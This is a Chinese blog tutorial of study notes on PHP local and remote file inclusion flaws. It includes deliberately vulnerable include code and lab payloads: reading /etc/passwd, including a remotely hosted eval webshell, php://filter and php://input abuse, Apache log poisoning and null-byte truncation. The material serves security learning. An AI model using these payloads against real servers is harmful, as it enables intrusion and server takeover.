文件包含漏洞

最新推荐文章于 2024-05-02 19:40:00 发布
最新推荐文章于 2024-05-02 19:40:00 发布
阅读量189 收藏
点赞数
分类专栏: 学习笔记 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51459600/article/details/123676791
版权

文件包含漏洞

大多是Web语言都可以只用文件包含操作,其中PHP语言所提供的文件包含功能比较强大、灵活,所以包含漏洞经常出现在PHP语言中。但并不是只用PHP语言会出现包含漏洞

PHP包含

四个函数:

include()、include_once()、require()、require()_once

  • require:找不到被包含文件时会产生致命错误,并停止脚本

  • include:找不到被包含文件时会产生警告,并继续执行脚本

  • require_ocne:与require相似,区别是如果文件中的代码已经被包含了,则不会再次包含

  • include_once:与include相似,区别是如果文件中的代码已经被包含了,则不会再次包含

本地包含:

测试一

ArrayUtil.php:

<?php
	function PrintArr($arr,$sp="-->",$lin="<br/>"){
		foreach($arr as $key => $value){
			echo "$key $sp $value $lin";
		}
	}
?>

test.php:

<?php
	include("ArrayUtil.php");  		#包含文件ArrayUtil.php
	$arr = array("张三","李四","王五");
	PrintArr($arr,"==>");
?>

访问:http://127.0.0.1/test.php

测试二

phpinfo.txt:

<?php
	phpinfo();
?>

test.php:

<?php
	include("phpinfo.txt");
?>

远程包含:

需要开启php.ini中的allow_url_include选项

测试

hello.php:

<?php
	echo "Hello world!!"
?>

test.php:

<?php
	include($_GET['page']);
?>

http://127.0.0.1/test.php?page=http://127.0.0.1/hello.php

其中,hello.php的后缀名换成txt等其他格式的后缀也可以成功实现远程包含

如果攻击者输入一个不存在的文件,php则会报错,在报错信息中会泄露网站的根目录

几种常见的攻击方式

  1. 读取敏感文件

    http://xxx.com/test.php?page=/etc/passwd

  2. 远程包含shell

    test.php:

    <?php
	include($_GET['page']);
?>

    ehco.txt:

    <?fputs(fopen("shell.php","w"),"<?php eval($_POST["hummer"]);?>")?>

    http://10.10.10.137/test.php?page=http://10.10.10.139/echo.txt

    测试未成功,在写入shell.php时,只能写入<? php eval() ?>

    但可以在远程主机上写一句话,通过远程包含,菜刀或者蚁剑也可以连接

    http://10.10.10.139/echo.txt:

    <?php eval($_POST['hummer']); ?>

    蚁剑连接:http://10.10.10.137/test.php?page=http://10.10.10.139/echo.txt

    测试成功!

  3. 配合文件上传

    上传图片,txt等格式的文件,通过文件包含,也可当做php代码执行。

  4. 使用PHP封装协议

    • 读取php文件

      使用条件:参数page被包含

      http://10.10.10.137/test.php?page=php://filter/read=convert.base64-encode/resource=test.php

      base64解码:

      PHP://filter具体用法参考如下连接:

      php://filter伪协议读取源码 | 信安小蚂蚁 (gitee.io)

    • 写文件:

      http://10.10.10.137/test.php?page=php://input

      利用POST方式传入内容:

      在这里可以执行任意系统命令:system(‘net user’);等

      亦可以写入文件

      <?fputs(fopen("shell.php","w"),"<?php phpinfo(); ?>")?>

    1. 包含Apache日志文件

      Apache运行后一般默认会生成两个日志文件(access.log和error.log),其中记录了客户端的每次请求以及 服务器响应的相关信息

      在找不到文件进行包含时,我们可以自己构造Apache日志,向里面写入我们的一句话木马:

      先发起请求:http://10.10.10.137/test.php?page=<?php eval($_POST['hummer']); ?>

      查看日志:

      [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-aUoTNGFS-1647996321498)(E:\学习笔记\渗透测试\学习笔记\渗透测试.assets\a2fSd89XFbHtvUK.png)]

      发现被浏览器自动转码了

      为了防止被编码,可以用BurpSute绕过编码:

      再次查看Apache日志:

      已经成功绕过编码

    2. 截断包含

      很多情况下,程序员会通过固定扩展名的方式来修复PHP包含漏洞。

      代码段如下:

      <?php
    if(isset($_GET['page'])){
        include $_GET['page']."php";
    }
	else{
        include 'home.php';
    }
?>

      虽然这样可以抵挡一部分攻击,但并没有真正修复了包含漏洞,攻击者仍然可以采取截断的方法来突破这段代码。

      http://www.xsser/com/test.php?page=1.jpg%00

      这用方法只适用于magic_quotes_gpc为Off的情况下,当php开启magic_quotes_gpc是,NULL(%00)会被转义

Hummer-200
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
通达OA v11.8 getway.php 远程文件包含漏洞.md
09-07
通达OA漏洞合集
web基础漏洞之命令执行漏洞
m0_62274649的博客
10-04 975
一些命令执行漏洞的总结,各种bypass掌握的还不好,继续更新
十大常见web漏洞及防范
热门推荐
姜亚轲的博客
07-29 6万+
十大常见web漏洞 一、SQL注入漏洞 SQL注入攻击(SQL Injection),简称注入攻击、SQL注入,被广泛用于非法获取网站控制权,是发生在应用程序的数据库层上的安全漏洞。在设计程序,忽略了对输入字符串中夹带的SQL指令的检查,被数据库误认为是正常的SQL指令而运行,从而使数据库受到攻击,可能导致数据被窃取、...
Web安全知多少
weixin_30896511的博客
08-05 1088
随着Web2.0、网络社交等一系列新型的互联网产品的诞生,基于Web环境的互联网应用越来越广泛,企业信息化的过程中,越来越多的应用都架设在Web平台上。Web业务的迅速发展吸引了黑客们的强烈关注,接踵而至的就是Web安全威胁的凸显。黑客利用网站操作系统的漏洞和Web服务程序的SQL注入漏洞等得到Web服务器的控制权限,轻则篡改网页内容,重则窃取重要内部数据,更为严重的则是在网页中植入恶意代码,使得...
文件包含
qq_74020399的博客
04-14 92
文件包含是php这种web开发语言的经典历史遗留漏洞,简而言之这种漏洞实质上是一种“代码注入“的攻击漏洞,原理在于注入一段用户能控制的脚本或者代码并让系统执行。主函数有(这篇主要是关于php文件包含的):include()require()当我们使用以上四个函数包含一个文件时,此文件将会被作为php代码执行,且php系统不会刻意过滤这个文件,由这个特性我们可以尝试向其中注入含有小马的图片(类似于文件上传),txt文档等。
php文件包含漏洞总结
cj_Hydra's Blog
02-26 1313
前言 一:什么是文件包含漏洞? 服务器通过PHP的特性(函数)去包含任意文件时,由于要包含的这个文件来源过滤不严,从而可以去包含一个恶意文件,而我可以构造这个恶意文件来达到攻击的目的。 漏洞产生的根本原因就是,在通过php的函数引入文件时,没有对传入的文件名经过合理的校验,从而操作了预想 之外的文件(也就是恶意文件)。 二:是不是只有php才有文件包含漏洞? 当然不是的,只是文件包含漏洞比较常出现...
文件包含漏洞及绕过方法(以php为例)
HMX404的博客
09-27 1万+
一,文件包含漏洞的由来 简单的来说,为了减少“重复造轮子”引入了文件包含函数,可以直接使用文件中的文件和代码。当通过动态获文件时,或者需要引用网络上其他文件时,用户通过对变量值的修改访问规定的文件,但是未对变量值进行校验,导致有了可乘之机,一般在php中常见。 <?php $file = $_GET('file'); include($file); #除此之外还有Include_once;require;require_once;highlight_file; #show_source;readfil
php代码审计及文件包含漏洞
xujunhui222的博客
02-15 3266
php代码审计及文件包含漏洞 一、文件包含漏洞介绍 1.什么是文件包含 相同代码重复出现在不同文件中出现代码亢余,所以出现了文件包含函数,就是让代码更为高效。需要用到的部分会去调用,且被包含文件会当PHP代码执行,忽略本身后缀名。文件包含分为本地文件包含(Loacl File Inclusion,LFI)和远程文件包含(Remote File Inclusion,RFI),远程文件包含需要在php.ini中设置allow_url_include = on 和 allow_url_fopen = on 2.
php——文件包含
记录并分享学习安全的知识点..
04-05 6055
一、文件包含的概念 在一个PHP脚本中,去将另外一个文件(PHP)包含进来,去合作完成一件事情。 二、文件包含的作用 要么使用被包含文件中的内容,实现代码的共享(重用):向上包含(索要)向上包含:在当前脚本要用某个代码之前包含别的文件 要么自己有东西可以给别的文件使用,实现代码的共享(重用):向下包含(给予)向下包含:在自己有某个东西的时候,需要别的脚本来显示(自己代码写完之后包含其他文件) 最大的作用:分工协作,每个脚本做的事情不一样,因此可以使用协作方式,让多个脚本共同完成...
PHP漏洞全解————10、PHP文件包含漏洞
Fly_鹏程万里
07-05 7816
基本相关函数&lt;&gt;php中引发文件包含漏洞的通常是以下四个函数:include()include_once()require()require_once()reuqire() 如果在包含的过程中有错,比如文件不存在等,则会直接退出,不执行后续语句。...
Web应用安全:文件包含漏洞简介.pptx
06-18
文件包含漏洞简介 文件包含漏洞简介 1、什么是文件包含漏洞? 开发人员通常会把可重复使用的函数写到单个文件中,在使用某些函数时,直接调用此文件,而无需再次编写,这种调用文件的过程一般被称为包含。 为了使...
08_理论8_文件包含漏洞的原理与实践_20180921
02-10
08_理论8_文件包含漏洞的原理与实践_20180921
PHP 网络开发详解之远程文件包含漏洞
12-18
以下代码(Code)实现了根据浏览器地址栏参数的文件名称包含不同文件的功能。 复制代码 代码如下: <?php $file_name = $_GET[“filename”]; //获得当前文件名 include(“$file_name “); //包含文件 //一些其他...
PHP网站有漏洞怎么修复和查找漏洞
网站安全专家
03-25 2936
ecshop目前最新版本为4.0,是国内开源的一套商城系统,很多外贸公司,以及电商平台都在使用,正因为使用的人数较多,很多攻击者都在挖掘该网站的漏洞,就在最近ecshop被爆出高危漏洞,该漏洞利用跨站伪造函数,来对网站数据库进行攻击。 ecshop 漏洞详情 该网站漏洞发生的根本原因是根目录下的user.php文件,在第315-365行里的代码里,该代码主要是处理用户注册,用户登录的一些...
【网络安全篇】php文件包含漏洞
贤鱼的博客
10-13 1616
php文件包含漏洞--思路+例题讲解
十二个常见的Web安全漏洞总结及防范措施
A_991128a的博客
07-05 1057
本篇文章部分摘要自《OWASP Top 10 2017》。OWASP,开放式Web应用程序安全项目(Open Web Application Security Project)是一个组织,它提供有关计算机和互联网应用程序的公正、实际、有成本效益的信息。其目的是协助个人、企业和机构来发现和使用可信赖软件。
网络安全风险里的威胁建模
最新发布
qq_41432686的博客
05-02 878
网络安全的本质是攻防双方的对抗与博弈。然而,由于多种攻防之间的不对称性因素存在,使得攻击者总能在对抗过程中抢占先机。为了更好地了解潜在的威胁和缺陷,实现主动式防御,企业需要重新考虑他们的网络防护方法,而威胁建模(Threat modeling)正是网络安全武器库中关键防御武器。
java 文件包含漏洞
01-05
Java 文件包含漏洞是指在 Java 程序开发中存在的一种安全漏洞。这种漏洞通常出现在程序中使用了不安全的文件包含函数的情况下。 在 Java 中,文件包含函数可以通过一些方式导入外部文件,比如使用相对路径或绝对...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值